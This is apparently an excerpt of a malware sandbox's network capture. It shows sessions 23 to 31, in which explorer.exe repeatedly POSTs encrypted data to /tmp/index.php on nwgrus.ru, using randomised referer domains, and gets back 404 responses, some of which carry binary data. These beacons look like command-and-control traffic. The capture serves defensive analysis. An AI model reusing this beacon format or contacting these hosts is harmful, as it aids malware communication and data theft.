                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            23192.168.2.450573116.58.10.60802580C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 11, 2024 06:37:55.777796984 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://rajflukkjfv.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 345
                                                            Host: nwgrus.ru
                                                            Oct 11, 2024 06:37:55.777796984 CEST345OUTData Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 2b 57 e1 f1
                                                            Data Ascii: ;nTfa!uu}wb~|E[Xm+? 9Yt M@NA -[k,vu+W[*oswYb-Dza/OJf2 1__P|<5^bjiI-B[6w^0FPHA,!GYfAWNf`]1X_|
                                                            Oct 11, 2024 06:37:57.005718946 CEST189INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Fri, 11 Oct 2024 04:37:56 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb
                                                            Data Ascii: #\6Y9l_m=rA


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            24192.168.2.450581116.58.10.60802580C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 11, 2024 06:37:58.776828051 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://toscrejivnmddao.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 131
                                                            Host: nwgrus.ru
                                                            Oct 11, 2024 06:37:58.776828051 CEST131OUTData Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2c 5b 1c 6b 2c 90 f4 76 0b 75 35 38 ff e0
                                                            Data Ascii: ;nTfa!uu}wb~|E[Xm+? 9Yt M@NA ,[k,vu58\UFyZ8Q0}`r&|Z
                                                            Oct 11, 2024 06:38:00.041280031 CEST484INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Fri, 11 Oct 2024 04:37:59 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            25192.168.2.450592116.58.10.60802580C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 11, 2024 06:38:00.051572084 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://xkeohrrlcufnjh.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 180
                                                            Host: nwgrus.ru
                                                            Oct 11, 2024 06:38:00.051572084 CEST180OUTData Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 38 43 ba f4
                                                            Data Ascii: ;nTfa!uu}wb~|E[Xm+? 9Yt M@NA -[k,vu8CsYmr(C+34F'PS-(DX_ab>[
                                                            Oct 11, 2024 06:38:01.303699017 CEST484INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Fri, 11 Oct 2024 04:38:01 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            26192.168.2.450598116.58.10.60802580C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 11, 2024 06:38:01.353420019 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://wmgqjswjxdwbrcxb.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 289
                                                            Host: nwgrus.ru
                                                            Oct 11, 2024 06:38:01.353645086 CEST289OUTData Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 28 4a cf 93
                                                            Data Ascii: ;nTfa!uu}wb~|E[Xm+? 9Yt M@NA -[k,vu(Jy&xh[%6ncBI2eC!W9(cdt/*N$[z7MG~qnKGaBzWM=4
                                                            Oct 11, 2024 06:38:02.601669073 CEST484INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Fri, 11 Oct 2024 04:38:02 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            27192.168.2.450609116.58.10.60802580C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 11, 2024 06:38:02.619596958 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://kfvlpgkryjcljktf.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 178
                                                            Host: nwgrus.ru
                                                            Oct 11, 2024 06:38:02.619611025 CEST178OUTData Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 33 03 dd 94
                                                            Data Ascii: ;nTfa!uu}wb~|E[Xm+? 9Yt M@NA -[k,vu3)TkH(A$."_J\:%AQD<NCes1=sN4n
                                                            Oct 11, 2024 06:38:03.860030890 CEST484INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Fri, 11 Oct 2024 04:38:03 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            28192.168.2.450615116.58.10.60802580C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 11, 2024 06:38:04.121186972 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://qcmpeqxglbq.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 320
                                                            Host: nwgrus.ru
                                                            Oct 11, 2024 06:38:04.121220112 CEST320OUTData Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 10 6b 2c 90 f5 76 0b 75 38 37 f0 9b
                                                            Data Ascii: ;nTfa!uu}wb~|E[Xm+? 9Yt M@NA -[k,vu87{_\`DTkm:G9<z4m13l#W`~(0=dUd$R:*Fsf \tkF$y?(
                                                            Oct 11, 2024 06:38:05.389015913 CEST484INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Fri, 11 Oct 2024 04:38:05 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            29192.168.2.450626116.58.10.60802580C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 11, 2024 06:38:05.398963928 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://xorfrgussemjiclx.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 333
                                                            Host: nwgrus.ru
                                                            Oct 11, 2024 06:38:05.398978949 CEST333OUTData Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 11 6b 2c 90 f5 76 0b 75 7f 50 e8 eb
                                                            Data Ascii: ;nTfa!uu}wb~|E[Xm+? 9Yt M@NA -[k,vuPPXjK/~"[0sv[#[("4C1GEv$P6b1.TO`OnG;i+0)I,vwuco8C[
                                                            Oct 11, 2024 06:38:06.632905960 CEST484INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Fri, 11 Oct 2024 04:38:06 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            30192.168.2.450636116.58.10.60802580C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 11, 2024 06:38:06.721301079 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://bpaltdgxnlbrc.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 123
                                                            Host: nwgrus.ru
                                                            Oct 11, 2024 06:38:06.724843025 CEST123OUTData Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 16 6b 2c 90 f5 76 0b 75 54 52 e6 e1
                                                            Data Ascii: ;nTfa!uu}wb~|E[Xm+? 9Yt M@NA -[k,vuTRN8oUDc&Hh0>`WZEt
                                                            Oct 11, 2024 06:38:07.949136019 CEST484INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Fri, 11 Oct 2024 04:38:07 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            31192.168.2.450643116.58.10.60802580C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 11, 2024 06:38:07.959048033 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://ourjknfcrerebmfy.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 154
                                                            Host: nwgrus.ru
                                                            Oct 11, 2024 06:38:07.959081888 CEST154OUTData Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 17 6b 2c 90 f5 76 0b 75 5c 59 a6 e8
                                                            Data Ascii: ;nTfa!uu}wb~|E[Xm+? 9Yt M@NA -[k,vu\Y8b^e(Op4q=OVGwA3sG("9w]2V
                                                            Oct 11, 2024 06:38:09.232206106 CEST484INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Fri, 11 Oct 2024 04:38:08 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
